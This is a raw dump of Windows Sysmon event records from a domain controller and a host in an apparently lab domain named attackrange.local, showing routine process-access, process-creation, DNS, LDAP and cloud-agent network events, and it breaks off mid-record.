09:20:20.075{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053811Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.075{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053810Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.075{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053809Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.075{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD4-6151-5100-00000000FD01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053808Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.074{5EBD8912-8CD2-6151-4300-00000000FD01}37603896C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{5EBD8912-8CD4-6151-5100-00000000FD01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+6f23e 154100x80000000000000001053807Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.075{5EBD8912-8CD4-6151-5100-00000000FD01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_OperatingSystem" "| Select-Object" "Version, OperatingSystemSKU" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 354300x80000000000000001053806Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.891{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49693-false169.254.169.254-80http 354300x80000000000000001053805Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.775{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49692-false169.254.169.254-80http 354300x80000000000000001053804Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.733{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49691-false169.254.169.254-80http 354300x80000000000000001053803Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.731{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49690-false169.254.169.254-80http 354300x80000000000000001053802Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.730{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49689-false169.254.169.254-80http 354300x80000000000000001053801Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.729{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49688-false169.254.169.254-80http 354300x80000000000000001053800Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.728{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49687-false169.254.169.254-80http 354300x80000000000000001053799Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.724{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49686-false169.254.169.254-80http 354300x80000000000000001053798Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.723{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49685-false169.254.169.254-80http 354300x80000000000000001053797Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.539{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50684- 354300x80000000000000001053796Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.399{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-62749- 354300x80000000000000001053795Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.399{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98c0:426:8c9e:ffff-62749-true7f00:1:0:0:0:0:0:0-53domain 354300x80000000000000001053794Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.738{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.15-63799- 354300x80000000000000001053793Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.738{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.15-63352- 354300x80000000000000001053792Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.738{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.15-49998- 354300x80000000000000001053791Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.540{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50684- 354300x80000000000000001053790Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.537{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49683-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001053789Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.537{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49683-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001053788Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.056{5EBD8912-8CD3-6151-4C00-00000000FD01}3152NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980531Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:20.231{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61AE3AC68AE35BEAE62F2C16CAD1EA41,SHA256=6D8E6C470CC5B6E751429009D320505EEDC2CE63BBF4103FF0E69B7D5E347DC1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054098Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.906{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD5-6151-6300-00000000FD01}3536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054097Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.906{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054096Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.906{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054095Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.906{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054094Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.906{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054093Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.906{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054092Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.906{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054091Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.906{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054090Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.906{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054089Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.906{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054088Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.906{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD5-6151-6300-00000000FD01}3536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054087Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.906{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD5-6151-6300-00000000FD01}3536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054086Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.910{5EBD8912-8CD5-6151-6300-00000000FD01}3536C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x80000000000000001054085Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:01.014{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\System32\svchost.exeC:\Windows\System32\NetSetupSvc.dll10.0.14393.4467 (rs1_release.210604-1844)Network Setup ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationNETSETUPSVC.DLLMD5=9DFC2E95D31B43B2833D3760C7E00A4B,SHA256=894FB2AC7BA15C6CCDBC62480B27A01A8FAE5B55E13D537251986D87B5A12483,IMPHASH=14F8BB5E943EA23F79CC3EC6B8C493FBtrueMicrosoft WindowsValid 10341000x80000000000000001054084Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.832{5EBD8912-8CD2-6151-4700-00000000FD01}38483868C:\Windows\system32\conhost.exe{5EBD8912-8CD5-6151-6200-00000000FD01}3396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054083Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 